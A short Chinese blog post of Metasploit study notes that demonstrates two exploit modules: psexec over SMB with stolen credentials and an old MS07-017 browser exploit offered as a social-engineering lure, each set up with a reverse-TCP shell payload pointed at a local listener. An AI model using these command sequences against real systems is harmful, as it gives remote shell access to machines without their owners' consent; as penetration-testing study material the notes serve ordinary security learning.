MSF学习(5)exploit模块(演示)

五:exploit模块(演示)

1:Active expolit(主动攻击,不开防火墙)

msf5 > use exploit/windows/smb/psexec

msf5 exploit(windows/smb/psexec) > show options

msf5 exploit(windows/smb/psexec) > set SMBUSER

msf5 exploit(windows/smb/psexec) > set SMBPASS

msf5 exploit(windows/smb/psexec) > set payload windows/shell/reverse_tcp

msf5 exploit(windows/smb/psexec) > show options

msf5 exploit(windows/smb/psexec) > exploit

msf5 exploit(windows/smb/psexec) > sessions -l(查看shell)

msf5 exploit(windows/smb/psexec) > sessions -i 1(进入shell)

exit 退出

2:passive exploits(被动社会工程学诱导)

msf5 > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set SRVHOST 192.168.1.10

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set lhost 192.168.1.10

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > exploit

lsof -i:port(端口):查看端口使用情况

Kill -9 (进程pid):杀死端口进程

posted @ 2020-05-22 10:40  adsry  阅读(802)  评论(0编辑  收藏  举报